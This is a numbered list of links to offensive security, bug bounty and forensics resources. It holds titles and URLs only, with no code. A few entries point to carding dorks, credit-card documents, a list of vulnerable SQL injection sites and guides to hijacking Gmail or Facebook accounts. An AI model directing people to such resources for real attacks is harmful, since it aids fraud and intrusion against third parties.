-630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING: https://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/ -631-GCAT – BACKDOOR EM PYTHON: https://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/ -632-Latest Carding Dorks List for Sql njection 2019: https://latestechnews.com/carding-dorks/ -633-google docs for credit card: https://latestechnews.com/tag/google-docs-for-credit-card/ -634-How To Scan Multiple Organizations With Shodan and Golang (OSINT): https://medium.com/p/d994ba6a9587 -635-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -636-phishing: https://www.blackhillsinfosec.com/tag/phishing/ -637-Merlin in action: Intro to Merlin: https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I -638-IP Cams from around the world: https://medium.com/p/a6f269f56805 -639-Advanced Cross Site Scripting(XSS) Cheat Sheet by Jaydeep Dabhi: https://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/ -640-Just how easy it is to do a domain or subdomain take over!?: https://medium.com/p/265d635b43d8 -641-How to Create hidden user in Remote PC: http://www.hackingarticles.in/create-hidden-remote-metaspolit -642-Process Doppelgänging – a new way to impersonate a process: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ -643-How to turn a DLL into astandalone EXE: https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/ -644-Hijacking extensions handlers as a malware persistence method: https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/ -645-I'll Get Your Credentials ... Later!: https://www.fuzzysecurity.com/tutorials/18.html -646-Game Over: CanYouPwnMe > Kevgir-1: https://www.fuzzysecurity.com/tutorials/26.html -647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities: http://www.greyhathacker.net/?p=995 -648-Getting started in Bug Bounty: https://medium.com/p/7052da28445a -649-Union SQLi Challenges (Zixem Write-up): https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60 -650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites: https://gbhackers.com/scanless-port-scans-websites-behalf -651-WEBAPP PENTEST: https://securityonline.info/category/penetration-testing/webapp-pentest/ -652-Cross-Site Scripting (XSS) Payloads: https://securityonline.info/tag/cross-site-scripting-xss-payloads/ -653-sg1: swiss army knife for data encryption, exfiltration & covert communication: https://securityonline.info/tag/sg1/ -654-NETWORK PENTEST: https://securityonline.info/category/penetration-testing/network-pentest/ -655-SQL injection in an UPDATE query - a bug bounty story!: https://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html -656-Cross-site Scripting: https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ -657-Local File Inclusion: https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/ -658-Command Injection: https://www.netsparker.com/blog/web-security/command-injection-vulnerability/ -659-a categorized list of Windows CMD commands: https://ss64.com/nt/commands.html -660-Understanding Guide for Nmap Timing Scan (Firewall Bypass): http://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass -661-RFID Hacking with The Proxmark 3: https://blog.kchung.co/tag/rfid/ -662-A practical guide to RFID badge copying: https://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying -663-Denial of Service using Cookie Bombing: https://medium.com/p/55c2d0ef808c -664-Vultr Domain Hijacking: https://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking -665-Command and Control: https://vincentyiu.co.uk/red-team/domain-fronting -666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers: https://gbhackers.com/cisco-global-exploiter-cge -667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -668-Situational Awareness: https://pentestlab.blog/2018/05/28/situational-awareness/ -669-Unquoted Service Path: https://pentestlab.blog/2017/03/09/unquoted-service-path -670-NFS: https://pentestacademy.wordpress.com/2017/09/20/nfs/ -671-List of Tools for Pentest Rookies: https://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/ -672-Common Windows Commands for Pentesters: https://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/ -673-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -674-OSINT x UCCU Workshop on Open Source Intelligence: https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence -675-Advanced Attack Techniques: https://www.cyberark.com/threat-research-category/advanced-attack-techniques/ -676-Credential Theft: https://www.cyberark.com/threat-research-category/credential-theft/ -678-The Cloud Shadow Admin Threat: 10 Permissions to Protect: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ -679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk: https://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/ -680-Weakness Within: Kerberos Delegation: https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/ -681-Simple Domain Fronting PoC with GAE C2 server: https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/ -682-Find Critical Information about a Host using DMitry: https://www.thehackr.com/find-critical-information-host-using-dmitry/ -683-How To Do OS Fingerprinting In Kali Using Xprobe2: http://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA -684-Crack SSH, FTP, Telnet Logins Using Hydra: https://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/ -685-Reveal Saved Passwords in Browser using JavaScript Injection: https://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/ -686-Nmap Cheat Sheet: https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf -687-Manual Post Exploitation on Windows PC (Network Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command -688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool: http://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool -689-Hack Locked Workstation Password in Clear Text: http://www.hackingarticles.in/hack-locked-workstation-password-clear-text -690-How to Find ALL Excel, Office, PDF, and Images in Remote PC: http://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc -691-red-teaming: https://www.redteamsecure.com/category/red-teaming/ -692-Create a Fake AP and Sniff Data mitmAP: http://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/ -693-Bruteforcing From Nmap Output BruteSpray: http://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/ -694-Reverse Engineering Framework radare2: http://www.uaeinfosec.com/reverse-engineering-framework-radare2/ -695-Automated ettercap TCP/IP Hijacking Tool Morpheus: http://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/ -696-List Of Vulnerable SQL Injection Sites: https://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199 -697-Command and Control – Gmail: https://pentestlab.blog/2017/08/03/command-and-control-gmail/ -698-Command and Control – DropBox: https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ -699-Skeleton Key: https://pentestlab.blog/2018/04/10/skeleton-key/ -700-Secondary Logon Handle: https://pentestlab.blog/2017/04/07/secondary-logon-handle -701-Hot Potato: https://pentestlab.blog/2017/04/13/hot-potato -702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -703-Linux-Kernel-exploits: http://tacxingxing.com/category/exploit/kernel-exploit/ -704-Linux-Kernel-Exploit Stack Smashing: http://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/ -705-Linux Kernel Exploit Environment: http://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/ -706-Linux-Kernel-Exploit NULL dereference: http://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/ -707-Apache mod_python for red teams: https://labs.nettitude.com/blog/apache-mod_python-for-red-teams/ -708-Bounty Write-up (HTB): https://medium.com/p/9b01c934dfd2/ 709-CTF Writeups: https://medium.com/ctf-writeups -710-Detecting Malicious Microsoft Office Macro Documents: http://www.greyhathacker.net/?p=872 -711-SQL injection in Drupal: https://hackerone.com/reports/31756 -712-XSS and open redirect on Twitter: https://hackerone.com/reports/260744 -713-Shopify login open redirect: https://hackerone.com/reports/55546 -714-HackerOne interstitial redirect: https://hackerone.com/reports/111968 -715-Ubiquiti sub-domain takeovers: https://hackerone.com/reports/181665 -716-Scan.me pointing to Zendesk: https://hackerone.com/reports/114134 -717-Starbucks' sub-domain takeover: https://hackerone.com/reports/325336 -718-Vine's sub-domain takeover: https://hackerone.com/reports/32825 -719-Uber's sub-domain takeover: https://hackerone.com/reports/175070 -720-Read access to Google: https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ -721-A Facebook XXE with Word: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/ -722-The Wikiloc XXE: https://www.davidsopas.com/wikiloc-xxe-vulnerability/ -723-Uber Jinja2 TTSI: https://hackerone.com/reports/125980 -724-Uber Angular template injection: https://hackerone.com/reports/125027 -725-Yahoo Mail stored XSS: https://klikki.fi/adv/yahoo2.html -726-Google image search XSS: https://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html -727-Shopify Giftcard Cart XSS : https://hackerone.com/reports/95089 -728-Shopify wholesale XSS : https://hackerone.com/reports/106293 -729-Bypassing the Shopify admin authentication: https://hackerone.com/reports/270981 -730-Starbucks race conditions: https://sakurity.com/blog/2015/05/21/starbucks.html -731-Binary.com vulnerability – stealing a user's money: https://hackerone.com/reports/98247 -732-HackerOne signal manipulation: https://hackerone.com/reports/106305 -733-Shopify S buckets open: https://hackerone.com/reports/98819 -734-HackerOne S buckets open: https://hackerone.com/reports/209223 -735-Bypassing the GitLab 2F authentication: https://gitlab.com/gitlab-org/gitlab-ce/issues/14900 -736-Yahoo PHP info disclosure: https://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ -737-Shopify for exporting installed users: https://hackerone.com/reports/96470 -738-Shopify Twitter disconnect: https://hackerone.com/reports/111216 -739-Badoo full account takeover: https://hackerone.com/reports/127703 -740-Disabling PS Logging: https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs -741-macro-less-code-exec-in-msword: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ -742-5 ways to Exploiting PUT Vulnerability: http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit -743-5 Ways to Exploit Verb Tempering Vulnerability: http://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability -744-5 Ways to Hack MySQL Login Password: http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password -745-5 Ways to Hack SMB Login Password: http://www.hackingarticles.in/5-ways-to-hack-smb-login-password -746-6 Ways to Hack FTP Login Password: http://www.hackingarticles.in/6-ways-to-hack-ftp-login-password -746-6 Ways to Hack SNMP Password: http://www.hackingarticles.in/6-ways-to-hack-snmp-password -747-6 Ways to Hack VNC Login Password: http://www.hackingarticles.in/6-ways-to-hack-vnc-login-password -748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter: http://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter -749-Beginner Guide to IPtables: http://www.hackingarticles.in/beginner-guide-iptables -750-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -751-Exploit Remote Windows 10 PC using Discover Tool: http://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool -752-Forensics Investigation of Remote PC (Part 2): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2 -753-5 ways to File upload vulnerability Exploitation: http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation -754-FTP Penetration Testing in Ubuntu (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21 -755-FTP Penetration Testing on Windows (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-windows -756-FTP Pivoting through RDP: http://www.hackingarticles.in/ftp-pivoting-rdp -757-Fun with Metasploit Payloads: http://www.hackingarticles.in/fun-metasploit-payloads -758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC: http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc -759-Generating Reverse Shell using Msfvenom (One Liner Payload): http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload -760-Generating Scan Reports Using Nmap (Output Scan): http://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan -761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled): http://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled -762-Hack ALL Security Features in Remote Windows 7 PC: http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc -763-5 ways to Exploit LFi Vulnerability: http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability -764-5 Ways to Directory Bruteforcing on Web Server: http://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server -765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit -766-Hack Gmail and Facebook Password in Network using Bettercap: http://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap -767-ICMP Penetration Testing: http://www.hackingarticles.in/icmp-penetration-testing -768-Understanding Guide to Mimikatz: http://www.hackingarticles.in/understanding-guide-mimikatz -769-5 Ways to Create Dictionary for Bruteforcing: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing -770-Linux Privilege Escalation using LD_Preload: http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/ -771-2 Ways to Hack Remote Desktop Password using kali Linux: http://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux -772-2 ways to use Msfvenom Payload with Netcat: http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat -773-4 ways to Connect Remote PC using SMB Port: http://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port -774-4 Ways to DNS Enumeration: http://www.hackingarticles.in/4-ways-dns-enumeration -775-4 Ways to get Linux Privilege Escalation: http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation -776-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -777-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -778-OSINT Cheat Sheet: https://hack2interesting.com/osint-cheat-sheet/ -779-OSINT Cheat Sheet: https://infoskirmish.com/osint-cheat-sheet/ -780-OSINT Links for Investigators: https://i-sight.com/resources/osint-links-for-investigators/ -781- Metasploit Cheat Sheet : https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html -782- Exploit Development Cheat Sheet: https://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4 -783-Building Profiles for a Social Engineering Attack: https://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/ -784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes): https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html -785-Getting the goods with CrackMapExec: Part 2: https://byt3bl33d3r.github.io/tag/crackmapexec.html -786-Bug Hunting Methodology (part-1): https://medium.com/p/91295b2d2066 -787-Exploring Cobalt Strike's ExternalC2 framework: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/ -788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities: https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/ -789-Adversarial Tactics, Techniques & Common Knowledge: https://attack.mitre.org/wiki/Main_Page -790-Bug Bounty — Tips / Tricks / JS (JavaScript Files): https://medium.com/p/bdde412ea49d -791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition): https://medium.com/p/f88a9f383fcc -792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution: https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/ -795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ -800-Capcom Rootkit Proof-Of-Concept: https://www.fuzzysecurity.com/tutorials/28.html -801-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -802-Beginners Guide for John the Ripper (Part 1): http://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -803-Working of Traceroute using Wireshark: http://www.hackingarticles.in/working-of-traceroute-using-wireshark/ -804-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/ -805-4 ways to SMTP Enumeration: http://www.hackingarticles.in/4-ways-smtp-enumeration -806-4 ways to Hack MS SQL Login Password: http://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password -807-4 Ways to Hack Telnet Passsword: http://www.hackingarticles.in/4-ways-to-hack-telnet-passsword -808-5 ways to Brute Force Attack on WordPress Website: http://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website -809-5 Ways to Crawl a Website: http://www.hackingarticles.in/5-ways-crawl-website -810-Local Linux Enumeration & Privilege Escalation Cheatsheet: https://www.rebootuser.com/?p=1623 -811-The Drebin Dataset: https://www.sec.cs.tu-bs.de/~danarp/drebin/download.html -812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else: https://www.slideshare.net/x00mario/es6-en -813-IT and Information Security Cheat Sheets: https://zeltser.com/cheat-sheets/ -814-Cheat Sheets - DFIR Training: https://www.dfir.training/cheat-sheets -815-WinDbg Malware Analysis Cheat Sheet: https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -819-Cheat Sheet for Analyzing Malicious Software: https://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/ -820-Analyzing Malicious Documents Cheat Sheet - Prodefence: https://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/ -821-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -823-Windows Registry Auditing Cheat Sheet: https://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology -824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know: https://kennyvn.com/cheatsheet-useful-bash-commands-linux/ -825-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition): https://securedyou.com/best-kali-linux-commands-terminal-hacking/ -827-Kali Linux Commands Cheat Sheet: https://www.pinterest.com/pin/393431717429496576/ -827-Kali Linux Commands Cheat Sheet A To Z: https://officialhacker.com/linux-commands-cheat-sheet/ -828-Linux commands CHEATSHEET for HACKERS: https://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/ -829-100 Linux Commands – A Brief Outline With Cheatsheet: https://fosslovers.com/100-linux-commands-cheatsheet/ -830-Kali Linux – Penetration Testing Cheat Sheet: https://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/ -831-Basic Linux Terminal Shortcuts Cheat Sheet : https://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/ -832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} : https://itechhacks.com/kali-linux-and-linux-commands/ -833-Transferring files from Kali to Windows (post exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux: https://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet -835-What is penetration testing? 10 hacking tools the pros use: https://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html -836-Best Hacking Tools List for Hackers & Security Professionals in 2019: https://gbhackers.com/hacking-tools-list/ -837-ExploitedBunker PenTest Cheatsheet: https://exploitedbunker.com/articles/pentest-cheatsheet/ -838-How to use Zarp for penetration testing: https://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/ -839-Wireless Penetration Testing Cheat Sheet; https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ -840-Pentest Cheat Sheets: https://www.cheatography.com/tag/pentest/ -841-40 Best Penetration Testing (Pen Testing) Tools in 2019: https://www.guru99.com/top-5-penetration-testing-tools.html -842-Metasploit Cheat Sheet: https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -843-OSCP useful resources and tools; https://acknak.fr/en/articles/oscp-tools/ -844-Pentest + Exploit dev Cheatsheet: https://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/ -845-What is Penetration Testing? A Quick Guide for 2019: https://www.cloudwards.net/penetration-testing/ -846-Recon resource: https://pentester.land/cheatsheets/2019/04/15/recon-resources.html -847-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -848-Recon Cheat Sheets: https://www.cheatography.com/tag/recon/ -849-Penetration Testing Active Directory, Part II: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ -850-Reverse-engineering Cheat Sheets: https://www.cheatography.com/tag/reverse-engineering/ -851-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows -853-PROPagate: http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/ -854-Process Doppelgänging, by Tal Liberman and Eugene Kogan:: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf -855-Gargoyle: https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html -856-GHOSTHOOK: https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/ -857-Learn C: https://www.programiz.com/c-programming -858-x86 Assembly Programming Tutorial: https://www.tutorialspoint.com/assembly_programming/ -859-Dr. Paul Carter's PC Assembly Language: http://pacman128.github.io/pcasm/ -860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration: http://opensecuritytraining.info/IntroX86.html -861-x86 Disassembly: https://en.wikibooks.org/wiki/X86_Disassembly -862-use-of-dns-tunneling-for-cc-communications-malware: https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ -863-Using IDAPython to Make Your Life Easier (Series):: https://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/ -864-NET binary analysis: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/ -865-detailed analysis of the BlackEnergy3 big dropper: https://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/ -866-detailed analysis of Uroburos rootkit: https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg -867-TCP/IP and tcpdump Pocket Reference Guide: https://www.sans.org/security-resources/tcpip.pdf -868-TCPDUMP Cheatsheet: http://packetlife.net/media/library/12/tcpdump.pdf -869-Scapy Cheatsheet: http://packetlife.net/media/library/36/scapy.pdf -870-WIRESHARK DISPLAY FILTERS: http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf -871-Windows command line sheet: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf -872-Metasploit cheat sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf -873-IPv6 Cheatsheet: http://packetlife.net/media/library/8/IPv6.pdf -874-IPv4 Subnetting: http://packetlife.net/media/library/15/IPv4_Subnetting.pdf -875-IOS IPV4 ACCESS LISTS: http://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf -876-Common Ports List: http://packetlife.net/media/library/23/common_ports.pdf -877-WLAN: http://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf -878-VLANs Cheatsheet: http://packetlife.net/media/library/20/VLANs.pdf -879-VoIP Basics CheatSheet: http://packetlife.net/media/library/34/VOIP_Basics.pdf -880-Google hacking and defense cheat sheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf -881-Nmap CheatSheet: https://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0 -882-Netcat cheat sheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf -883-PowerShell cheat sheet: https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf -884-Scapy cheat sheet POCKET REFERENCE: https://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf -885-SQL injection cheat sheet.: https://information.rapid7.com/sql-injection-cheat-sheet-download.html -886-Injection cheat sheet: https://information.rapid7.com/injection-non-sql-cheat-sheet-download.html -887-Symmetric Encryption Algorithms cheat sheet: https://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/ -888-Intrusion Discovery Cheat Sheet v2.0 for Linux: https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf -889-Intrusion Discovery Cheat Sheet v2.0 for Window: https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf -890-Memory Forensics Cheat Sheet v1.2: https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf -891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH: https://www.sans.org/brochure/course/log-management-in-depth/6 -892-Evidence collection cheat sheet: https://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf -893-Hex file and regex cheat sheet v1.0: https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf -894-Rekall Memory Forensic Framework Cheat Sheet v1.2.: https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf -895-SIFT WORKSTATION Cheat Sheet v3.0.: https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf -896-Volatility Memory Forensic Framework Cheat Sheet: https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf -897-Hands - on Network Forensics.: https://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf -898-VoIP Security Vulnerabilities.: https://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036 -899-Incident Response: How to Fight Back: https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342 -900-BI-7_VoIP_Analysis_Fundamentals: https://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf -901-Bug Hunting Guide: cybertheta.blogspot.com/2018/08/bug-hunting-guide.html -902-Guide 001 |Getting Started in Bug Bounty Hunting: https://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun... -903-SQL injection cheat sheet : https://portswigger.net › Web Security Academy › SQL injection › Cheat sheet -904-RSnake's XSS Cheat Sheet: https://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/ -905-Bug Bounty Tips (2): https://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/ -906-A Review of my Bug Hunting Journey: https://kongwenbin.com/a-review-of-my-bug-hunting-journey/ -907-Meet the First Hacker Millionaire on HackerOne: https://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/ -908-XSS Cheat Sheet: https://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/ -909-Bug Bounty Hunter Methodology: https://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016 -910-#10 Rules of Bug Bounty: https://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c -911-Bugbounty Checklist: https://www.excis3.be/bugbounty-checklist/21/ -912-FireBounty | The Ultimate Bug Bounty List!: https://firebounty.com/ 